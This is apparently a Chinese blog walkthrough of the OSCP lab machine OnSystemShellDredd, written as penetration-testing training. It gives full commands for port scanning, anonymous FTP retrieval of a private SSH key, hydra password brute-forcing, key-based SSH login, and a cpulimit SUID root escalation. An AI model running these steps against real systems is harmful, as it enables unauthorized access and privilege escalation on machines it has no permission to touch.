OSCP靶机----OnSystemShellDredd

从WEB到内网&&FTP匿名&&SSH密钥登录&&SUID提权

今天来打一个OSCP的靶机,难度中等,包含了端口探测,服务探测,FTP匿名登录,ssh密钥登录,suid提权等等…靶场难度中等,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境

启动VPN:openvpn universal.ovpn
image.png
攻击机IP为:192.168.45.173
启动靶机:
image.png
靶机IP为: 192.168.156.130

信息收集

1.端口

nmap扫描端口
nmap --min-rate 10000 -p- 192.168.156.130
image.png
目标开放了21,61000两个端口(多扫几遍,有时候一遍会不准确。)
详细探测一下端口信息。
nmap -p 21,61000 -sV 192.168.156.130
image.png
这个靶机竟然没有http服务,很少见。那就围绕这两个端口往下走。

2.端口测试

2.121-ftp
拿到ftp,先试试匿名用户anonymous登录。
ftp 192.168.156.130
image.png
匿名用户密码一般都是空或者Email,这里空密码直接登录成功了。

ftp文件收集:
binary    #以二进制模式传输文件,保证文件完整
ls -al
cd .hannah
ls -al
get id_rsa  #下载文件

经过ls查找,有一个id_rsa文件,直接下载下来,看一下有没有用。
cat id_rsa
image.png
内容加密了,待定。
2.261000-ssh
拿到ssh,老样子,先看下对应的版本有没有脚本可以利用
searchsploit OpenSSH 7.9
image.png
没有,试一下手工登录。
ssh root@192.168.156.130 -p 61000
image.png
失败,用hydra爆破吧。线程为6,字典用msf的。
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.156.130 ssh -s 61000
等待…
在这里插入图片描述
没有爆出来。

攻击阶段

回到刚才收集到的id_rsa文件,看上去是base64加密的,试一下解密。
image.png
解密后发现了root@OffShell,这应该就是shh登录密码,只是不知道用户,用文件ssh密钥。尝试登录:
ssh -i id_rsa root@192.168.156.130 -p 61000
image.png
密码错误,思路错了。可能不是root用户,倒回去是有一个.hannah文件的,试一下.hannah当用户登录。
ssh -i id_rsa .hannah@192.168.156.130 -p 61000
image.png
.hannah不行,试一下hannah
ssh -i id_rsa hannah@192.168.156.130 -p 61000
image.png
有不一样的东西出来了
这个错误It is required that your private key files are NOT accessible by others.翻译一下就是私钥文件不能被其他人访问,解决办法就是要让别人不可读写这个文件。
修改id_rsa权限:
chmod 600 id_rsa
ssh -i id_rsa hannah@192.168.156.130 -p 61000
image.png
成功登录,有shell了。

内网渗透

获取flag1:
find / -name local.txt 2>/dev/null
cat /home/hannah/local.txt
image.png

提权

1.内核overlayfs提权
lsb_release -a看看发行版本
image.png
Debian,不能overlayfs提权
2.低内核版本提权
uname -a
image.png
4.19.0,不太行。
3.sudo提权
sudo -l
image.png
不存在sudo
4.suid提权
find / -perm -u=s -type f 2>/dev/null
image.png
有一个没见过的cpulimit,去https://gtfobins.github.io搜一下
image.png
果真有
image.png
直接用起来:
cpulimit -l 100 -f -- /bin/sh -p
image.png
成功提到root权限!
获取flag2:
cat /root/proof.txt
image.png
完结。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值